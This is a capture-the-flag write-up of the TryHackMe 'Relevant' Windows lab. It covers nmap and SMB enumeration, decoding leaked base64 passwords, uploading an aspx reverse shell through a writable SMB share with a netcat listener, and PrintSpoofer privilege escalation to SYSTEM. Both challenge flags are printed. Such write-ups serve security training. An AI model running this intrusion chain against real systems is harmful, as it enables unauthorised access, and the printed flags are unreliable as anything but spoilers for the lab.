TryHackMe - Relevant - Writeup
Penetration Testing Challenge
Pre-Engagement Briefing
You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days.
Scope of Work
The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you secure two flags (no location provided) as proof of exploitation:
* User.txt
* Root.txt
Additionally, the client has provided the following scope allowances:
* Any tools or techniques are permitted in this engagement, however we ask that you attempt manual exploitation first
* Locate and note all vulnerabilities found
* Submit the flags discovered to the dashboard
* Only the IP address assigned to your machine is in scope
* Find and report ALL vulnerabilities (yes, there is more than one path to root) (Roleplay off)
I encourage you to approach this challenge as an actual penetration test. Consider writing a report, to include an executive summary, vulnerability and exploitation assessment, and remediation suggestions, as this will benefit you in preparation for the eLearnSecurity Certified Professional Penetration Tester or career as a penetration tester in the field. Note - Nothing in this room requires Metasploit
Machine may take up to 5 minutes for all services to start.
Writeups will not be accepted for this room.
Nmap Scan
root@ip-10-10-130-6:~# nmap -sCV -A -p- -T4 10.10.247.68
Starting Nmap 7.60 ( https://nmap.org ) at 2021-05-24 17:33 BST
Stats: 0:00:27 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 1.45% done; ETC: 17:48 (0:14:47 remaining)
Nmap scan report for 10.10.247.68
Host is up (0.00048s latency).
Not shown: 65526 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2021-05-23T15:56:53
|_Not valid after: 2021-11-22T15:56:53
|_ssl-date: 2021-05-24T16:48:30+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49663/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
MAC Address: 02:26:91:22:B0:8F (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: RELEVANT, NetBIOS user: <unknown>, NetBIOS MAC: 02:26:91:22:b0:8f (unknown)
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: Relevant
| NetBIOS computer name: RELEVANT\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-05-24T09:48:30-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-24 17:48:30
|_ start_date: 2021-05-24 16:57:11
TRACEROUTE
HOP RTT ADDRESS
1 0.48 ms 10.10.247.68
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 965.68 seconds
root@ip-10-10-130-6:~#
From the default 80 port I saw it’s windows machine tried to brute force to get any interesting directory but nothing found. So, I move forward for enumuarate SMB.
SMB share enumuration
root@ip-10-10-194-77:~# smbclient -L //10.10.24.156
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
nt4wrksv Disk
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.24.156 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
Found a intersting Sharename nt4wrksv. Let’s check what’s in there.
Checking SMB Shares
root@ip-10-10-194-77:~# smbclient //10.10.24.156/nt4wrksv
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon May 24 13:42:57 2021
.. D 0 Mon May 24 13:42:57 2021
passwords.txt A 98 Sat Jul 25 16:15:33 2020
7735807 blocks of size 4096. 5129957 blocks available
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (2.3 KiloBytes/sec) (average 2.3 KiloBytes/sec)
smb: \> exit
root@ip-10-10-194-77:~# cat passwords.txt
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
We found two base64 encoded password let’s decode it.
Decode Base64
root@ip-10-10-194-77:~# echo Qm9iIC0gIVBAJCRXMHJEITEyMw== | base64 --decode
Bob - !P@$$W0rD!123
root@ip-10-10-194-77:~# echo QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQkr | base64 --decode
Bill - Juw4nnaM4n420696969!$$$
I tried these password and username to login via Remote Desktop. In the nmap result as we can see 3389 RDP port open. No password worked I saw another web port open 49663 as same as the 80 port. I checked few things such as brute directory for 49663 HTTP port. While I bruted with directory-list-2.3-medium.txt it took me long time.
root@ip-10-10-130-6:~# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.111.29:49663/ -t 30 -a Mozilla/5.0
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.111.29:49663/
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: Mozilla/5.0
[+] Timeout: 10s
===============================================================
2021/05/24 18:20:19 Starting gobuster
===============================================================
[ERROR] 2021/05/24 18:22:33 [!] Get http://10.10.111.29:49663/con: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/05/24 18:26:23 [!] Get http://10.10.111.29:49663/55139: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/05/24 18:26:23 [!] Get http://10.10.111.29:49663/internet_utilities: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/05/24 18:26:23 [!] Get http://10.10.111.29:49663/myinfo: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/05/24 18:26:23 [!] Get http://10.10.111.29:49663/20861: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/05/24 18:26:23 [!] Get http://10.10.111.29:49663/83263: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/nt4wrksv (Status: 301)
===============================================================
2021/05/24 18:45:07 Finished
===============================================================
I found directory as same name as nt4wrksv SMB share. I was curious and tried to check if I can see the passwords.txt in there so naviagte to http://10.10.111.29:49663/nt4wrksv/passwords.txt it returned the same password information. If this is the case then we can create a asp shell to get access.
Found a aspx Reverse Shell change the IP and Port and upload it to the nt4wrksv SMB share and try to access it.
root@ip-10-10-137-185:~# smbclient //10.10.111.29/nt4wrksv
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> put shell.aspx
putting file shell.aspx as \shell.aspx (7796.5 kb/s) (average 7796.9 kb/s)
smb: \> ls
. D 0 Mon May 24 19:00:12 2021
.. D 0 Mon May 24 19:00:12 2021
passwords.txt A 98 Sat Jul 25 16:15:33 2020
shell.aspx A 15968 Mon May 24 19:00:12 2021
7735807 blocks of size 4096. 5135457 blocks available
smb: \>
I droped the shell into the SMB share. We got shell and also found our first flag user.txt
root@ip-10-10-137-185:~# nc -nlvp 4545
Listening on [0.0.0.0] (family 0, port 4545)
Connection from 10.10.111.29 49912 received!
Spawn Shell...
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
C:\Users\Bob\Desktop>type user.txt
type user.txt
THM{fdk4ka34vk346ksxfr21tg789ktf45}
It’s time for escalate privilege. In windows machine whenever I going to escalate privilege I use whoami /priv to check which privilege enable. It’s my very basic methodology to check.
c:\windows\system32\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeImpersonatePrivilege is enabled previously I have escalate a box using same technique as the description said we don’t need to use metasploit. I searched for SeImpersonatePrivilege exploit and found this one printspoofer. Using printspoofer we can get root.
Now upload printspoofer.exe using smbclient and execute it from shell.
root@ip-10-10-68-160:~# smbclient //10.10.166.92/nt4wrksv
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> put PrintSpoofer.exe
putting file PrintSpoofer.exe as \PrintSpoofer.exe (6624.8 kb/s) (average 6625.0 kb/s)
I executed it from c:\inetpub\wwwroot\nt4wrksv , We got root Yay!
c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>type root.txt
type root.txt
THM{1fk5kf469devly1gl320zafgl345pv}
Thanks for reading.
Machine Link: Relevant